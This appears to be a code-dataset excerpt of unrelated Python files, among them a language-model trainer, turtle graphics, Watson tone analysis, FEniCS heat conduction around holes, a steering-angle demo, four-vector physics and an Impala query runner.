Time: %.2fs, speed: %.2fst/s, total loss: %s, acc: %s/%s=%.4f\"%(idx, epoch_cost, train_num/epoch_cost, total_loss, right_token, whole_token,(right_token+0.)/whole_token))\n\n if total_loss > 1e8 or str(total_loss) == \"nan\":\n print(\"ERROR: LOSS EXPLOSION (>1e8) ! PLEASE SET PROPER PARAMETERS AND STRUCTURE! EXIT....\")\n exit(1)\n # continue\n\n current_score = (right_token+0.)/whole_token\n\n if current_score > best_dev:\n\n print(\"Exceed previous best acc:\", best_dev)\n # model_name = data.model_dir +'.'+ str(idx) + \".model\"\n model_name = lm_model_dir + \".lm.model\"\n # print(\"Save current best model in file:\", model_name)\n torch.save(model.state_dict(), model_name)\n best_dev = current_score\n\n bad_counter = 0\n else:\n bad_counter += 1\n\n gc.collect()\n\n if bad_counter >= patience:\n print('Early Stop!')\n break\n\n if current_score > lm_obj_acc:\n print('current accuracy {} > objective accuracy {}, exit ...'.format(current_score, lm_obj_acc))\n break\n\n\nif __name__ == '__main__':\n print('train a bilstm language model')\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--config', help='Configuration File', default='None')\n\n args = parser.parse_args()\n data = Data()\n\n if args.config == 'None':\n raise RuntimeError(\"must provide a config file\")\n else:\n data.read_config(args.config)\n\n status = data.status.lower()\n print(\"Seed num:\",seed_num)\n\n if status == 'train':\n data_initialization(data)\n data.generate_instance('train')\n data.generate_instance('dev')\n data.build_pretrain_emb()\n train(data)\n elif status == 'decode':\n print(\"Invalid argument!\")\n else:\n print(\"Invalid argument!\")","sub_path":"main_lm1.py","file_name":"main_lm1.py","file_ext":"py","file_size_in_byte":13679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"351208315","text":"import turtle\n\ndef draw_colour_square(some_turtle):\n list_colour = [\"Blue\", \"Purple\", \"White\", \"Green\", \"Yellow\"]\n for i in list_colour:\n some_turtle.color(i)\n some_turtle.forward(100)\n some_turtle.right(90)\n\ndef draw_colour_square_art():\n window = turtle.Screen()\n window.bgcolor('Blue')\n # Here I'll create an instance called supersquare\n supersquare = turtle.Turtle()\n supersquare.shape('turtle')\n supersquare.color('white')\n supersquare.speed(2)\n for i in range(1,37):\n draw_colour_square(supersquare)\n supersquare.right(10)\n window.exitonclick()\n\ndef draw_square(some_turtle):\n for i in range(1,5):\n some_turtle.forward(100)\n #on bellow method \"90\" means 90 degrees to right\n some_turtle.right(90)\n\ndef draw_art():\n window = turtle.Screen()\n window.bgcolor('Blue')\n # Here I'll create an instance called supersquare\n supersquare = turtle.Turtle()\n supersquare.shape('turtle')\n supersquare.color('white')\n supersquare.speed(2)\n for i in range(1,37):\n draw_square(supersquare)\n supersquare.right(10)\n window.exitonclick()\n\n#draw_art()\ndraw_colour_square_art()\n\n","sub_path":"PFWPython/mindstorms.py","file_name":"mindstorms.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"235482936","text":"# coding: utf-8\n\"\"\"\nDELETE THIS FILE IN PRODUCTION!!!!\n\"\"\"\n\n# from quokka.utils.settings import get_password\n\n# MONGODB_SETTINGS = {'DB': \"quokka\",\n# 'USERNAME': 'quokka',\n# 'PASSWORD': get_password('db'),\n# 'HOST': 'ds035498.mongolab.com',\n# 'PORT': 35498} # use for mongolab\n\nMONGODB_SETTINGS 
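# Self-contained sketch of the best-score checkpointing and patience-based
# early stopping used in train_on_domain above. Scores are dummy values; the
# real loop saves model.state_dict() with torch.save at each new best.
best, bad, patience = -1.0, 0, 3
for score in [0.60, 0.62, 0.61, 0.61, 0.61]:
    if score > best:
        best, bad = score, 0  # checkpoint would be written here
    else:
        bad += 1
        if bad >= patience:
            print("early stop at best =", best)
            break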
= {'DB': 'local_test3'}\nDEBUG = True\nDEBUG_TOOLBAR_ENABLED = False\n","sub_path":"quokka/example.local_settings.py","file_name":"example.local_settings.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"271190532","text":"import json\nfrom watson_developer_cloud import ToneAnalyzerV3\nfrom TranslateText import translate_text\nfrom watson_developer_cloud import WatsonApiException\n# APIキーをconfig.pyに書いて参照\nimport config\n\ndef analyze_emotion_from_text(text):\n \"\"\"\n テキスト(日本語不可)から感情を分析する\n Watson - ToneAnalyzer\n \"\"\"\n API_KEY = config.API_KEY_TONEANALYZER\n URL = \"https://gateway-tok.watsonplatform.net/tone-analyzer/api\"\n try:\n # Invoke a Tone Analyzer method\n tone_analyzer = ToneAnalyzerV3(\n version='2017-09-21',\n iam_apikey=API_KEY,\n url=URL\n )\n\n tone_analysis = tone_analyzer.tone(\n {'text': text},\n 'application/json'\n ).get_result()\n \n return json.dumps(tone_analysis, indent=4, ensure_ascii=False)\n\n except WatsonApiException as ex:\n print(\"Method failed with status code \" + str(ex.code) + \": \" + ex.message)\n\nif __name__ == \"__main__\":\n # textに、Speech-to-Textの結果が渡される\n # サンプルのテキスト\n text = 'Team, I know that times are tough! Product '\\\n 'sales have been disappointing for the past three '\\\n 'quarters. We have a competitive product, but we '\\\n 'need to do a better job of selling it!'\n \n # Google翻訳で、日本語を英語に翻訳する\n print(\"Translate Japanese -> English\")\n orig_text = \"これめっちゃ面白いな。これ何円で買える?\"\n print(\"inputted text = {}\".format(orig_text))\n translate_response = translate_text(orig_text)\n\n # JSON文字列をプログラムで使用可能な形式に変換(デコード)\n # 参考サイト:http://programming-study.com/technology/python-json-dumps/\n decoded_json = json.loads(translate_response)\n # JSONから翻訳結果の文のみを抽出\n translate_result = decoded_json[\"translations\"][0][\"translation\"]\n print(\"translate_result = {}\".format(translate_result))\n print()\n\n ### 英訳したテキストを感情分析する\n print(\"Tone Analyze translated text\")\n print(\"inputted text = {}\".format(translate_result))\n analyze_response = analyze_emotion_from_text(translate_result)\n \n # JSONをデコード\n decoded_json = json.loads(analyze_response)\n # 分析結果を抽出\n analyze_result = decoded_json[\"document_tone\"]\n print(\"analyze_result = {}\".format(analyze_result))","sub_path":"ToneAnalyzer.py","file_name":"ToneAnalyzer.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"128785547","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年11月22日\n@author: Administrator\n'''\nfrom numpy import array,dot,random,exp\ndef sigmord(x):\n return 1/(1+exp(-x))\ndef error_output(o,t):\n return o*(1-o)*(t-o)\nx_input=[]\ny_target=[]\nlearning_rate=0.2\nrandom.seed(1)\nx_input=random.random((4,3))\nfor i in range(x_input.shape[0]):\n y_target.append(sum(x_input[i])/3)\ny_target=array(y_target)\nw_ij=2*random.random((2,3))-1\nw_jo1=2*random.random()-1\nw_jo2=2*random.random()-1\nb=2*random.random((3,1))-1\ndef FP(x,w1,w2,w3,b):\n lj1=dot(x,w1[0])+b[0]\n sigmord_lj1=sigmord(lj1)\n lj2=dot(x,w1[1])+b[1]\n sigmord_lj2=sigmord(lj2)\n lj3=(sigmord_lj1 *w2) + (sigmord_lj2 *w3) + b[2]\n output=sigmord(lj3)\n return output,sigmord_lj1,sigmord_lj2\ny_output,sigmord_lj1,sigmord_lj2=FP(x_input,w_ij,w_jo1,w_jo2,b)\n# print y_output,sigmord_lj1,sigmord_lj2\n# y_output=array(y_output)\n# 
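# Self-contained sketch of the logistic activation and the output-layer error
# term o*(1-o)*(t-o) that the small network above uses in its weight updates.
from numpy import exp

def sigmoid(x):
    return 1 / (1 + exp(-x))

o, t = sigmoid(0.3), 0.8       # output and target
delta = o * (1 - o) * (t - o)  # squared-error gradient through the sigmoid
print(delta)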
y_output=y_output.T\nerror_output1=error_output(y_output,y_target)\nw_jo1+=learning_rate*error_output1*sigmord_lj1\nw_jo2+=learning_rate*error_output1*sigmord_lj2\n\n \n \n \n \n \n \n \n \n","sub_path":"mypython/DecisionTree/NW1.py","file_name":"NW1.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"52383989","text":"#!/usr/bin/env python3\n\n# This script walks through the revision history of the\n# legislators-social-media.yaml file to construct a historical view of social\n# media accounts for legislators.\n\nimport git\nimport rtyaml\nimport datetime\n\n\ndef main():\n repo = git.Repo('..')\n\n print('loading all legislators')\n legis = rtyaml.load(open('../legislators-historical.yaml'))\n legis.extend(rtyaml.load(open('../legislators-current.yaml')))\n\n # examine each commit to the social yaml file and merge into results\n for commit in repo.iter_commits(paths=['legislators-social-media.yaml']):\n created = datetime.datetime.fromtimestamp(commit.committed_date)\n print('examining', created)\n for blob in commit.tree.blobs:\n if blob.path == 'legislators-social-media.yaml':\n try:\n social = rtyaml.load(blob.data_stream)\n merge(social, legis, created)\n except rtyaml.yaml.error.YAMLError as e:\n print(\"yaml in commit didn't parse: {}\".format(commit))\n\n output_file = 'social.yaml'\n print('writing {}'.format(output_file))\n open(output_file, 'w').write(rtyaml.dump(legis))\n\n\ndef merge(social, legis, committed):\n \"merge the social information into the legisltors, recording the date if needed\"\n if type(social) != list:\n return\n\n date = committed.strftime('%Y-%m-%d')\n for s in social:\n\n # get the legislator\n l = find(s['id']['bioguide'], legis)\n\n # set the social property if needed\n if not 'social' in l:\n l['social'] = {}\n\n # add any new social info\n for platform, profile_id in s['social'].items():\n if platform not in l['social']:\n l['social'][platform] = {}\n if profile_id not in l['social'][platform]:\n l['social'][platform][profile_id] = date\n if date < l['social'][platform][profile_id]:\n l['social'][platform][profile_id] = date\n\n\ndef find(id, legis):\n \"Find the legislator with bioguide id\"\n matches = list(filter(lambda l: l['id']['bioguide'] == id, legis))\n assert len(matches) == 1\n return matches[0]\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/social_media_history.py","file_name":"social_media_history.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"607647488","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numpy\nfrom dolfin import *\nfrom mshr import *\nfrom datetime import datetime\n\nclass boundary_vertical(SubDomain):\n\tdef __init__(self, posicao):\n\t\tself.posicao = posicao\n\t\tSubDomain.__init__(self) # Call base class constructor!\n\tdef inside(self, x, on_boundary):\n\t\treturn on_boundary and abs(x[0] - self.posicao) < DOLFIN_EPS\n\nclass ball(SubDomain):\n def __init__(self, triangulo):\n self.xc = triangulo.centro[0]\n self.yc = triangulo.centro[1]\n self.R = triangulo.raio\n SubDomain.__init__(self) # Call base class constructor!\n def inside(self, x, on_boundary ):\n r = sqrt( ( x[0] - self.xc )**2 + ( x[1] - self.yc )**2 )\n return( on_boundary and ( r Elapsed time: ', str(elapsed_time), '\\n')\n\n\treturn Tfin, Tholes, area\n\ndef ComputeTfin(order, mesh, Lx, cond, f, Tleft, 
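# Minimal GitPython sketch of the history walk in the social-media script
# above: iterate only the commits that touched one file and recover each
# commit's timestamp. The repository path is assumed.
import datetime
import git

repo = git.Repo(".")
for commit in repo.iter_commits(paths=["legislators-social-media.yaml"]):
    when = datetime.datetime.fromtimestamp(commit.committed_date)
    print(commit.hexsha[:8], when.strftime("%Y-%m-%d"))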
Tright, Thole, balls):\n \t\n\t# Auxilary function\n\tF0 = Constant(0)\n\n\tnballs = len(balls)\n\n\t# Construindo os subdomains das condicoes de contorno\n\tleft = boundary_vertical(0)\n\tright = boundary_vertical(Lx)\n\n\tstartTime = datetime.now()\n\n\tPk = FiniteElement(\"Lagrange\", 'triangle', order)\n\tW = FunctionSpace(mesh, Pk)\n\n\tdomains = MeshFunction(\"size_t\", mesh, 2, mesh.domains())\n\tdx = Measure(\"dx\")(subdomain_data=domains)\n\n\t# Variational problem\n\tu = TrialFunction(W)\n\tv = TestFunction(W)\n\ta = inner(cond*grad(u), grad(v))*dx\n\tL = f*v*dx\n\n\tfaux = Function(W)\n\tfaux = interpolate(Constant(1.0),W)\n\tarea = assemble(faux*dx)\n\n\t# Dirichlet boundary conditions\n\tbcleft = DirichletBC(W, Tleft, left)\n\tbcright = DirichletBC(W, Tright, right)\n\tbcs = [bcleft, bcright]\n\tfor ib in range(nballs):\n\t\tbcs.append(DirichletBC(W, Constant(Thole[ib]), balls[ib]))\n\n\tTh = Function(W)\n\tprint(\" |--Global size system = \", len(Th.vector()), \"\\n\")\n\n\tproblem = LinearVariationalProblem(a, L, Th, bcs)\n\tsolver = LinearVariationalSolver(problem)\n\tprm = solver.parameters\n\tprm[\"linear_solver\"]= \"gmres\"\n\tprm[\"preconditioner\"]= \"hypre_euclid\"\n\tprm[\"krylov_solver\"][\"absolute_tolerance\"]= 1e-12\n\tprm[\"krylov_solver\"][\"relative_tolerance\"]= 1e-10\n\tprm[\"krylov_solver\"][\"maximum_iterations\"]= 100\n\tprm[\"krylov_solver\"][\"monitor_convergence\"]= False\n\tprm[\"krylov_solver\"][\"nonzero_initial_guess\"]= True\n\tsolver.solve()\n\t\n\n\telapsed_time = datetime.now() - startTime\n\tprint('\\n ::> Elapsed time: ', str(elapsed_time), '\\n')\n\n\treturn Th, W, dx\n\ndef ConstruirDomain(nsd, Lx, Ly, tipo_hole, nballs, centers, radii, angulo, p1):\n\t# Criando o dominio\n\tholes = []\n\tif(nsd == 2):\n\t\tdomain = Rectangle(Point(0.0,0.0), Point(Lx,Ly))\n\t\tfor ib in range(nballs):\n\t\t\t\n\t\t\tif( tipo_hole=='triangulo' ):\n\t\t\t\tholes.append( Triangulo( centers[ib], radii[ib], angulo[ib], p1[ib], False) )\n\t\t\telif( tipo_hole=='circulo' ):\n\t\t\t\tholes.append( Circulo(centers[ib], radii[ib]) )\n\t\t\telse:\n\t\t\t\tprint('Tipo de hole nao definido...')\n\t\t\t\texit()\n\t\t\t\n\t\t\tdomain = domain - holes[ib]\n\telse:\n\t\tsys.exit(\"nsd.eq.3 not implemented\")\n\n\treturn domain, holes\n\ndef ConstruirMalha(mesh, domain, nr, order, tipo_hole, balls, centers, radii):\n\n\tnballs = len(balls)\n\n\tif(nr == 0):\n\t\tmesh.append(generate_mesh( domain, 15*(1.5*nr+1) ))\n\t\tplot(mesh[0])\n\t\tplt.show()\n\telse:\n\t\tmesh.append(refine(mesh[nr-1], redistribute=False))\n\n\n\tif(order == 2):\n\t\tmesh[nr] = p_refine(mesh[nr])\n\t\tmesh[nr].init()\n\n\t# Project points to circles\n\tif( tipo_hole=='circulo' ):\n\t\tmovebpoints = 1\n\t\tif(movebpoints):\n\t\t\tfor x in mesh[nr].coordinates():\n\t\t\t\tfor ib in range(nballs):\n\t\t\t\t\tif balls[ib].inside(x, True):\n\t\t\t\t\t\trr = math.sqrt((x[0] - centers[ib][0])**2 + (x[1] - centers[ib][1])**2)\n\t\t\t\t\t\tx[0] = centers[ib][0] + radii[ib]*(x[0]-centers[ib][0])/rr\n\t\t\t\t\t\tx[1] = centers[ib][1] + radii[ib]*(x[1]-centers[ib][1])/rr\n\n\tprint(\" |-Mesh done - Step: %d\" %(nr))\n\tprint(\" |--Number of vertices = \"+str(mesh[nr].num_vertices()))\n\tprint(\" |--Number of cells = \"+str(mesh[nr].num_cells()))\n\tprint(\" |--Cell size hmax,hmin = %.3g %.3g\" % (mesh[nr].hmax(), mesh[nr].hmin()))\n\ndef distancia(A, B):\n\treturn np.sqrt( (B[0] - A[0])**2 + (B[1] - A[1])**2 )\n\ndef Rotacao(v, angulo):\n\tv2x = math.cos(angulo)*v[0] - math.sin(angulo)*v[1]\n\tv2y = 
math.sin(angulo)*v[0] + math.cos(angulo)*v[1]\n\treturn np.array([v2x, v2y])\n\n\nclass Triangulo(Polygon):\n\tdef __init__(self, c_in, raio, angulo, arco_p1, plotar_circulo=False):\n\n\t\tangulo = np.pi*angulo/180.0\n\t\tarco_p1 = np.pi*arco_p1/180.0\n\n\t\t# Transformando em numpy array, caso venha como lista\n\t\tC = np.array(c_in)\n\t\teixo_x = np.array( [1, 0] )\n\n\t\t# p1 e p2 estao, por definicao, na mesma altura (coord. y) que o centro do circumcirculo\n\t\tp1 = np.array( [np.cos(arco_p1), np.sin(arco_p1)] )\n\t\tp1 = C + raio*p1\n\n\n\t\t# Funcao do circumcirculo\n\t\tf2 = lambda alfa:( funcao_pontocirc(C, raio, p1, 0.5*angulo, alfa) )\n\t\tf3 = lambda alfa:( funcao_pontocirc(C, raio, p1, -0.5*angulo, alfa) )\n\n\t\talfa = bissecao(f2, 0.01, 1000.0)\n\t\tp2 = p1 + alfa*Rotacao(C - p1, 0.5*angulo)\n\n\t\talfa = bissecao(f3, 0.01, 1000.0)\n\t\tp3 = p1 + alfa*Rotacao(C - p1, -0.5*angulo)\n\n\t\tsuper().__init__([Point(p3), Point(p2), Point(p1)])\n\t\t\n\n\t\t# Plotando\n\t\tif plotar_circulo:\n\t\t\tcircle = plt.Circle((C[0], C[1]), raio, fill=False, color='#FF0000')\n\t\t\tplt.gca().add_artist(circle)\n\n\t\tself.raio = raio\n\t\tself.centro = C.tolist()\n\nclass Circulo(Circle):\n\tdef __init__(self, centro, raio):\n\t\tself.raio = raio\n\t\tself.centro = centro\n\n\t\tsuper().__init__(Point(centro[0], centro[1]), raio)\n\n\ndef bissecao(funcao, a, b):\n\n\tparar = 1e-10\n\twhile( abs(a-b)>parar ):\n\t\tfa = funcao(a)\n\t\tfb = funcao(b)\n\n\t\tif( fa*fb > 0 ):\n\t\t\treturn float('nan')\n\t\telif( fa==0 ):\n\t\t\treturn a\n\t\telif( fb==0 ):\n\t\t\treturn b\n\t\telse:\n\t\t\tmeio = 0.5*(a+b)\n\t\t\tif( funcao(meio)*fa < 0 ):\n\t\t\t\tb = meio\n\t\t\telse:\n\t\t\t\ta = meio\n\n\treturn 0.5*(a + b)\n\n\ndef funcao_pontocirc(C, raio, p, angulo, alfa):\n\n\tv = C - p\n\tv = Rotacao(v, angulo)\n\n\tp2 = p + alfa*v\n\tdif = C - p2\n\n\treturn np.dot(dif, dif) - raio*raio\n","sub_path":"exercicios-computacionais/trabalho-holes/modulo_Tholes.py","file_name":"modulo_Tholes.py","file_ext":"py","file_size_in_byte":8986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"397457513","text":"import tensorflow as tf\nimport scipy.misc\nimport model\nimport cv2\nfrom subprocess import call\nimport numpy as np\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver()\nsaver.restore(\n # sess, \"/home/liqifan/py_code/SelfCar-Tensorflow/save/model(10, 17, 7, 7).ckpt\")\n sess, \"/home/liqifan/py_code/SelfCar-Tensorflow/save/model(10, 17, 7, 7).ckpt\")\n\nimg = cv2.imread('/home/liqifan/py_code/SelfCar-Tensorflow/wheel.jpg', 0)\nimg2 = cv2.imread('/home/liqifan/py_code/SelfCar-Tensorflow/wheel.jpg', 0)\nrows, cols = img.shape\nf = open('/home/liqifan/driving_dataset/data.txt', 'r')\ndegress_h = np.array(f.read().split()).reshape((-1, 2))\nf.close()\nsmoothed_angle = 0\nsmoothed_angle_h = 0\n\ni = 0\nwhile(cv2.waitKey(10) != ord('q')):\n full_image = scipy.misc.imread(\n \"driving_dataset/\" + str(i) + \".jpg\", mode=\"RGB\")\n image = scipy.misc.imresize(full_image[-150:], [66, 200]) / 255.0\n\n degrees = model.y.eval(feed_dict={model.x: [image], model.keep_prob: 1.0})[\n 0][0] * 180.0 / scipy.pi\n human_degrees = float(degress_h[i, 1])\n\n call(\"clear\")\n print(\"Predicted steering angle: \" + str(degrees) + \" degrees\")\n cv2.imshow(\"frame\", cv2.cvtColor(full_image, cv2.COLOR_RGB2BGR))\n\n smoothed_angle += 0.2 * pow(abs((degrees - smoothed_angle)), 2.0 / 3.0) * (\n degrees - smoothed_angle) / abs(degrees - smoothed_angle)\n 
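# Self-contained version of the bissecao routine above with essentially the
# same contract: NaN when the bracket does not change sign, the midpoint of
# the final interval otherwise.
def bisect(f, a, b, tol=1e-10):
    fa, fb = f(a), f(b)
    if fa * fb > 0:
        return float("nan")
    while abs(b - a) > tol:
        m = 0.5 * (a + b)
        if f(m) * fa < 0:
            b = m
        else:
            a, fa = m, f(m)
    return 0.5 * (a + b)

assert abs(bisect(lambda x: x * x - 2.0, 0.0, 2.0) - 2.0 ** 0.5) < 1e-8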
smoothed_angle_h += 0.2 * pow(abs((human_degrees - smoothed_angle_h)), 2.0 / 3.0) * (\n human_degrees - smoothed_angle_h) / abs(degrees - smoothed_angle)\n\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), -smoothed_angle, 1)\n M2 = cv2.getRotationMatrix2D((cols / 2, rows / 2), -smoothed_angle_h, 1)\n\n dst = cv2.warpAffine(img, M, (cols, rows))\n dst2 = cv2.warpAffine(img2, M, (cols, rows))\n\n cv2.imshow(\"智障型老司机AI\", dst)\n # cv2.imshow(\"human\", dst2)\n i += 1\n\ncv2.destroyAllWindows()\n","sub_path":"run_dataset.py","file_name":"run_dataset.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"529162207","text":"import numpy as np\n\nclass FourVector:\n \n g=np.array([[1,0,0,0], #metric tensor\n [0,-1,0,0],\n [0,0,-1,0],\n [0,0,0,-1]])\n \n \n m=complex(0.1,0) #trying out invariant mass, will set this as an incident variable later\n \n def __init__(self,t=0,R=None,V=None): \n \n self.x=np.array([t,R[0],R[1],R[2]]) #space-time 4 vector\n \n if R and V is not None:\n \n self.R=np.array([R[0],R[1],R[2]]) #spatial part of the vector\n \n self.V=np.array([V[0],V[1],V[2]]) #velocity is given in c's, natural units\n \n self.p=np.array(FourVector.m*self.V) #3-momentum \n \n self.gam=1/np.sqrt(1-np.linalg.norm(V)**2) #gamma factor of the vector\n \n self.normR=np.array([0,2]) if np.linalg.norm(R)==0 else R/np.linalg.norm(R) #calculates the norm of 3-position\n \n self.normV=np.array([0,2]) if np.linalg.norm(V)==0 else V/np.linalg.norm(V) #calculates the norm of 3-velocity\n \n def SwitchToCoM(self,other): #this is currently for only two particles, will update later.\n for i in range(0,2):\n CoMR=np.array([(self.R[i-1]+other.R[i-1])/2,(self.R[i]+other.R[i])/2,(self.R[i+1]+other.R[i+1])/2]) \n return CoMR\n \n def LorentzTransform(self): \n #general Lorentz transform matrix for velocity\n self.TransfromMatrix=np.array([[self.gam,-self.gam*self.V[0],-self.gam*self.V[1],-self.gam*self.V[2]],\n [-self.gam*self.V[0],1+(self.gam-1)*self.normV[0]**2,(self.gam-1)*self.normV[0]*self.normV[1],(self.gam-1)*self.normV[0]*self.normV[2]],\n [-self.gam*self.V[1],(self.gam-1)*self.normV[0]*self.normV[1],1+(self.gam-1)*self.normV[1]**2,(self.gam-1)*self.normV[1]*self.normV[2]],\n [-self.gam*self.V[2],(self.gam-1)*self.normV[2]*self.normV[0],(self.gam-1)*self.normV[2]*self.normV[1],1+(self.gam-1)*self.normV[2]**2]])\n \n return np.dot(self.TransformMatrix,self.x)\n \n def FourDotProduct(self,other): #as the name says...\n return self.x@FourVector.g@other.x\n #return self.x[0]*other.x[0]-self.x[1]*other.x[1]-self.x[2]*other.x[2]-self.x[3]*other.x[3] \n #return np.trace(self.x*FourVector.g*other.x), this one also seems to be accurate but not as straightforward as the one above.\n \n def FourVelocity(self): #get 4-velocity from self.x type of input\n return np.array([self.gam*FourVector.c,self.gam*self.V[0],self.gam*self.V[1],self.gam*self.V[2]])\n \n def FourMomentum(self): #get4-momentum from 4-velocity\n return FourVector.m*FourVector.FourVelocity(self)\n \n def Addition(self,other): #vector addition\n return np.array([self.x[0]+other.x[0],self.x[1]+other.x[1],self.x[2]+other.x[2],self.x[3]+other.x[3]]) \n\n def Subtraction(self,other): #vector subtraction because why not\n return np.array([self.x[0]-other.x[0],self.x[1]-other.x[1],self.x[2]-other.x[2],self.x[3]-other.x[3]]) \n \n def Energy(self): #energy from E**2 = p**2 + m**2, would need to tweak this later. 
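# Sketch of the Minkowski inner product x·g·y that FourDotProduct in the
# four-vector class above evaluates, with the metric g = diag(1, -1, -1, -1).
import numpy as np

g = np.diag([1.0, -1.0, -1.0, -1.0])
x = np.array([2.0, 1.0, 0.0, 0.0])
y = np.array([3.0, 0.5, 0.0, 0.0])
print(x @ g @ y)  # 2*3 - 1*0.5 = 5.5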
\n E=((FourVector.m)**2+np.dot(self.p,self.p))**0.5\n return E \n \n \n\n#---------------------------DEFINING GAMMA MATRICES---------------------------------------------------------------- \n#Pauli Matrices\nPauli1=np.array([[0,1],[1,0]])\nPauli2=np.array([[0,-complex(0,1)],[complex(0,1),0]])\nPauli3=np.array([[1,0],[0,-1]])\n\n#Gamma Matrices constructed from Pauli Matrices using np.block()\nGamma0=np.block([[np.identity(2),np.zeros((2,2))],[np.zeros((2,2)),-np.identity(2)]])\nGamma1=np.block([[np.zeros((2,2)),Pauli1],[-Pauli1,np.zeros((2,2))]])\nGamma2=np.block([[np.zeros((2,2)),Pauli2],[-Pauli2,np.zeros((2,2))]])\nGamma3=np.block([[np.zeros((2,2)),Pauli3],[-Pauli3,np.zeros((2,2))]])\nGamma5=complex(0,1)*(Gamma0@Gamma1@Gamma2@Gamma3)\nN=FourVector(0,[2,5,1],[0.01,0.02,0.03])\n\n#--------------------------ASSIGNING REPRESENTATIONS TO SPINORS----------------------------------------------------\n\n#Defining Pauli Spinors\nA=np.array([0,1])\nB=np.array([1,0])\n\nX1=A.reshape(-1,1) #gives chi1, (0,1)\nX2=B.reshape(-1,1) #gives chi2, (1,0)\n\n\n#Introducing Dirac Spinors-for a specific vector N for now\nC1=np.array([N.p[2]/(FourVector.Energy(N)+FourVector.m),complex(N.p[0],N.p[1])/(FourVector.Energy(N)+FourVector.m)])\nD1=C1.reshape(-1,1)\n\nC2=np.array([complex(N.p[0],-N.p[1])/(FourVector.Energy(N)+FourVector.m),-N.p[2]/(FourVector.Energy(N)+FourVector.m)])\nD2=C2.reshape(-1,1)\n\neta=(FourVector.Energy(N)+FourVector.m)**0.5\n\nu1=eta*np.concatenate([X2,D1]) #u and v dirac spinors for a given mass, momentum and energy \nu2=eta*np.concatenate([X1,D2])\nv1=eta*np.concatenate([D1,X2])\nv2=eta*np.concatenate([D2,X1])\n\n#-------------------------------ATTEMPTING THE S FUNCTION----------------------------------------------------------\n#Would it be accurate to use np.dot() to multiply a k vector and a p vector?\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"4-Vector.py","file_name":"4-Vector.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"188212043","text":"import time\nimport logging\nfrom contextlib import closing\nfrom dae.query_variants.query_runners import QueryRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass ImpalaQueryRunner(QueryRunner):\n \"\"\"Run a Impala query in a separate thread.\"\"\"\n\n def __init__(self, connection_factory, query, deserializer=None):\n super().__init__(deserializer=deserializer)\n\n self.connection_pool = connection_factory\n self.query = query\n\n def connect(self):\n \"\"\"Connect to the connection pool and return the connection.\"\"\"\n started = time.time()\n while True:\n try:\n connection = self.connection_pool.connect()\n return connection\n except TimeoutError:\n elapsed = time.time() - started\n logger.debug(\n \"runner (%s) timeout in connect; elapsed %0.2fsec\",\n self.study_id, elapsed)\n if self.is_closed():\n logger.info(\n \"runner (%s) closed before connection established \"\n \"after %0.2fsec\",\n self.study_id, elapsed)\n return None\n\n def run(self):\n \"\"\"Execute the query and enqueue the resulting rows.\"\"\"\n started = time.time()\n if self.is_closed():\n logger.info(\n \"impala runner (%s) closed before executing...\",\n self.study_id)\n return\n\n logger.debug(\n \"impala runner (%s) started; \"\n \"connectio pool: %s\",\n self.study_id, self.connection_pool.status())\n\n connection = self.connect()\n\n if connection is None:\n self._finalize(started)\n return\n\n with closing(connection) as connection:\n elapsed = time.time() - 
started\n logger.debug(\n \"runner (%s) waited %0.2fsec for connection\",\n self.study_id, elapsed)\n with connection.cursor() as cursor:\n try:\n if self.is_closed():\n logger.info(\n \"runner (%s) closed before execution \"\n \"after %0.2fsec\",\n self.study_id, elapsed)\n self._finalize(started)\n return\n\n cursor.execute_async(self.query)\n self._wait_cursor_executing(cursor)\n\n while not self.is_closed():\n row = cursor.fetchone()\n if row is None:\n break\n val = self.deserializer(row)\n\n if val is None:\n continue\n\n self._put_value_in_result_queue(val)\n\n if self.is_closed():\n logger.debug(\n \"query runner (%s) closed while iterating\",\n self.study_id)\n break\n\n except Exception as ex: # pylint: disable=broad-except\n logger.error(\n \"exception in runner (%s) run: %s\",\n self.study_id, type(ex), exc_info=True)\n self._put_value_in_result_queue(ex)\n logger.debug(\n \"runner (%s) closing connection\", self.study_id)\n self.close()\n\n self._finalize(started)\n\n def _wait_cursor_executing(self, cursor):\n while True:\n if self.is_closed():\n logger.debug(\n \"query runner (%s) closed while executing\",\n self.study_id)\n break\n if not cursor.is_executing():\n logger.debug(\n \"query runner (%s) execution finished\",\n self.study_id)\n break\n time.sleep(0.1)\n\n def _finalize(self, started):\n with self._status_lock:\n self._done = True\n elapsed = time.time() - started\n logger.debug(\"runner (%s) done in %0.3f sec\", self.study_id, elapsed)\n logger.debug(\"connection pool: %s\", self.connection_pool.status())\n","sub_path":"impala_storage/impala_storage/helpers/impala_query_runner.py","file_name":"impala_query_runner.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"168262210","text":"\"\"\"\nCopyright (c) 2020, 2022, Oracle Corporation and/or its affiliates.\nLicensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.\n\"\"\"\nimport java.util.logging.Level as Level\n\nfrom 